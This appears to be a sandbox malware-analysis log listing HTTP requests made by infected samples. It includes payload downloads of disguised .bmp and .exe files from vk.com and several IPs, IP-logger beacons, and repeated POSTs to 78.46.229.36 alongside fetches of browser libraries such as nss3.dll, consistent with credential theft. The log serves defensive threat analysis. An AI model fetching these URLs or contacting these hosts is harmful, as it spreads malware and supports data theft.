Source: global traffic	HTTP traffic detected: GET /c237131/u329118071/docs/d54/a41cd49a4cc3/sm.bmp?extra=YhKLSKJ3mgzcHEPhKt29yMVwT7syu4DSX-r8FiniNu26GoYh--bacebk_lAweHd_nom6ZTYuZ1nbNqpT3z-oQcCb9yjZPvFkcjabKXHoUaPs7vLK8L7aMJYgb4R4exgpsuU8bf8kljG-Phg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-20.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc329118071_675792624?hash=XfyAKbRGjhzAxkfmvlCrdz9zJtdyzNRcHwmff3vnq80&dl=Ze3IH3BxY7vOa5jO9OGsVYOAjEXMtW2wRr8tC5P8SBE&api=1&no_preview=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c909328/u329118071/docs/d30/0bb5ce760b73/XFilePumper.bmp?extra=LfaiwsuY5AI1SgCQ2hZu1AgxBMymxLFFBDyOdai5jngk90oTeFijtt7Ic4wsMIEOy9NwgH9QmImjTPk5bd8yAGOmRqX65U99IViGTY1ZCiw1fayo7Fo0G4owW8CZYZOPW10clBZcrnDnQ8o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-21.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc329118071_676351627?hash=Prtaj0ZgUNfFsiq7F7Grkvgpr1vjXL0n0VmegSdJgKX&dl=o8jO07ZxaFiNzZmXTClzRvzF7C8XmRKzZNeLFFTGXhX&api=1&no_preview=1#mene HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c909218/u329118071/docs/d56/4889f8ef891f/crypted.bmp?extra=-LBKaniv3MRw05ku3d9Nr104OdGpfnHeS5WOM7N4VWIoDXtSDCsvx-PvX4usDvxD9PpMarCAxpv-2NOeS4PDQq1WB5ljz_YtSA7SRvFwbLxszvLa9N7DPL7VqJF6YMSwG6COqmXFKEg_y4Q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-22.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc329118071_676372534?hash=mU6chkoRzazMAQommLzbARbrOtVcQjV2nCZO5HLxzXD&dl=F4ujiRXkvZIoPyzlUTSDKXz4IzA9Z6pINj1zLZkzj5w&api=1&no_preview=1#a02 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cacheCookie: remixlang=3; remixstlid=9117847083090382120_GyCezWnUcFkAoaulqrTGNL6Wa7T5v9s33neHqUGXYzo; remixir=1
Source: global traffic	HTTP traffic detected: GET /c240331/u329118071/docs/d55/1831d7ba0e1f/crypted.bmp?extra=HVpBxhMcgZ3WEnQYJhUos_wUIgTD581u41drks9QawpVXgm6isoag9sFNXT6kFUNfmKUK0BATli7elFkZwxPtLGKC8Bc8453Aje1s8sxPwGBrTh5BDTLmWOuBUzVCNDrUBjJqzwS0s4DvCA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-21.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /c236331/u329118071/docs/d4/678b61126bd7/02.bmp?extra=u4x5o5e99u4NPac3pUrfyS7L46i-_X_MGUwFdXNYr1R5xwrrHeAQn1AOaKPAnboi5DP6qlx557JFMC-SX4vRmTo3ahIllC2PiaQqxxkkXoihUJfSh5X-gznnl4k0mxECRLjnx8NqK0MQ78M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: psv4.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1aFYp7.mp3 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplis.ru
Source: global traffic	HTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplogger.org
Source: global traffic	HTTP traffic detected: GET /1pRXr7.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplis.ru
Source: global traffic	HTTP traffic detected: GET /1BV4j7.mp4 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplis.ru
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAECBAEGDGDHIEHIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJECBKKECFIEBGCAKJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIJEBGDAFHIJJKEHCAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHJDHCBAEHJJJKKFIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 7577Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlm.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIJDHIDBGHJKECBFIIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKEBFHIJECFIDGDGCGHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFHDBKJEGHJJJKFIIJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Soft.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: centrosmissextensions.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Software.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: centrosmissextensions.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKEBFHIJECFIDGDGCGHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /widget/demo/102.165.48.43 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=102.165.48.43 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFIJKFHIJKKEBGCFBFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGDHJDAFHJEBFIDAFHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /widget/demo/102.165.48.43 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=102.165.48.43 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/102.165.48.43 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=102.165.48.43 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCFIDAFBFBAKFHJEGIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBFCGIDAKECGCBGDBAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /widget/demo/102.165.48.43 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=102.165.48.43 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 6993Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlm.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36If-Modified-Since: Mon, 25 Mar 2024 09:53:07 GMTIf-None-Match: "66014983-258600"Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJJJDHDGDAAKECAKJDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBFIIIEHCFHJKFHDHDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKJKKKJJJKJKFHJJJJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEGDAEHIEHIDHJDAAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Range: bytes=1024-If-Range: "6315a9f4-94750"Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Range: bytes=1024-If-Range: "6315a9f4-1f3950"Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHIDHDAKJDHJKEBFIEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/bing_release.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 46.226.167.187
Source: global traffic	HTTP traffic detected: POST /api/flash.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 113Host: 46.226.167.187
Source: global traffic	HTTP traffic detected: POST /api/flash.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 133Host: 46.226.167.187
Source: global traffic	HTTP traffic detected: HEAD /timeSync.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 185.172.128.6Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /retail.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.22Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /download/123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 195.20.16.46Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /data/pdf/june.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: act.fishoaks.netCache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /bjhgvfd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 294anacamptometer.sbsCache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /getimage.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.22Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /gyhu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 176.113.115.135Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /timeSync.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 185.172.128.6Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download/123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 195.20.16.46Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /space.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.22Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /retail.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.22Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /data/pdf/june.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: act.fishoaks.netCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /getimage.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.22Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /gyhu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 176.113.115.135Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /share/index.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: ngovpn.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /silno/download.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 193.233.132.139Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /bjhgvfd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 294anacamptometer.sbsCache-Control: no-cacheCookie: _subid=2os9o961spv0l; 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTE2MTM2OTl9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzExNjEzNjk5fSxcInRpbWVcIjoxNzExNjEzNjk5fSJ9.KHqIfUeldGCGZRbbj7rLIdUk1MeFJ0AXBEcAv6r9p8Q
Source: global traffic	HTTP traffic detected: GET /share/index.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: ngovpn.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /silno/download.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 193.233.132.139Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /space.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.22Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/flash.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 261Host: 46.226.167.187
Source: global traffic	HTTP traffic detected: POST /api/flash.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 669Host: 46.226.167.187
